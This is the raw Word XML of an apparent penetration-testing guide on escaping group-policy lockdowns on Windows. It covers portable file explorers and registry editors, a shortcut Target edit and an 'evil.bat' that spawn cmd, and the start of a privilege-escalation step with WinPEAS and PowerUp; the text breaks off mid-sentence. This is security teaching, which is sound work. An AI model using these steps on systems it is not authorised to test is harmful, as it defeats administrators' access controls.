            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Explorer++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is highly recommended and frequently used in such situations due to its speed, user-friendly interface, and portability. Being a portable application, it can be executed directly without the need for installation, making it a convenient choice for bypassing folder restrictions set by group policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33376A"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30AE4C46">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1B2C6"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lastRenderedPageBreak/>
        <w:t>Alternate Registry Editors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F944AE5" w14:textId="0A2088ED"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29B0F990" wp14:editId="4C5DDAE1">
            <wp:extent cx="3441434" cy="2053193"/>
            <wp:effectExtent l="0" t="0" r="6985" b="4445"/>
            <wp:docPr id="208663201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760" cy="2059354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709FB6D"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Similarly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the default Registry Editor is blocked by group policy, alternative Registry editors can be employed to bypass the standard group policy restrictions. </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Simpleregedit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Uberregedit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>SmallRegistryEditor</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are examples of such GUI tools that facilitate editing the Windows registry without being affected by the blocking imposed by group policy. These tools offer a practical and effective solution for managing registry settings in such restricted environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF3BF7"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0562E4E1">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC7BD9"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t xml:space="preserve">Modify existing shortcut </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A181D42"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Unauthorized access to folder paths can also be achieved by modifying existing Windows shortcuts and setting a desired executable's path in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A273655"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The following steps outline the process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C2E0C" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Right-click</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the desired shortcut.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F7407" w14:textId="707C250D" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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3DF33DDE" wp14:editId="71014174">
            <wp:extent cx="3729231" cy="2961983"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1660470888"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6670" cy="2967892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2F913" w14:textId="14347020" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> field, modify the path to the intended folder for access. </w:t>
      </w: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379934FB" wp14:editId="606F913A">
            <wp:extent cx="3580910" cy="2844177"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1970853342"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1029" cy="2852214"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A2126" w14:textId="48C2BEE0" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Execute the Shortcut and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be spawned </w:t>
      </w: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0B925807" wp14:editId="7CD991F9">
            <wp:extent cx="3580910" cy="2844177"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1707188280"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2499" cy="2853382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E68113"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In cases where an existing shortcut file is unavailable, there are alternative methods to consider. One option is to transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell as mentioned under </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Interacting with Users section</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Generating a Malicious .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> File</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab. These approaches provide versatility in achieving our objectives while working with shortcut files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2A0AC"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0847CC07">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AE077"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t>Script Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32522A58"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When script extensions such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are configured to automatically execute their code using their respective interpreters, it opens the possibility of dropping a script that can serve as an interactive console or facilitate the download and launch of various third-party applications which results into bypass of restrictions in place. This situation creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>potential security vulnerability where malicious actors could exploit these features to execute unauthorized actions on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F4837" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Create a new text file and name it "evil.bat".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F21C14" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Open "evil.bat" with a text editor such as Notepad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C0AA6" w14:textId="6AB7CED0" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Input the command "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">" into the file. </w:t>
      </w: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456AE6F5" wp14:editId="332A5A8A">
            <wp:extent cx="3715106" cy="2950764"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="96368254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6666" cy="2959946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A164E9" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC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Save the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA919FB"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Upon executing the "evil.bat" file, it will initiate a Command Prompt window. This can be useful for performing various command-line operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38569C22"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312B2A9C">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB09832"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t>Escalating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB99D2"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Once access to the command prompt is established, it's possible to search for vulnerabilities in a system more easily. For instance, tools like </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Winpeas</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>PowerUp</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be employed to identify potential security issues and vulnerabilities within the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD8D73E"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Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PowerUp.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find that </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
